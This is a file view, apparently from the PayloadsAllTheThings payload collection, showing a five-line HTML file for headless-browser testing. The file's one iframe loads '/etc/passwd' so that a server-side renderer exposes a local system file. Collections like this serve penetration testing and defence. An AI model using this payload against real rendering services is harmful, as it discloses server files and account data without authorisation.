PayloadsAllTheThings/Headless Browser/files/iframe.html

5 lines
106 B
HTML
Raw Permalink Normal View History

2024-05-31 00:07:21 +02:00
<html>
<body>
<iframe src="/etc/passwd" height="640" width="640"></iframe>
</body>
</html>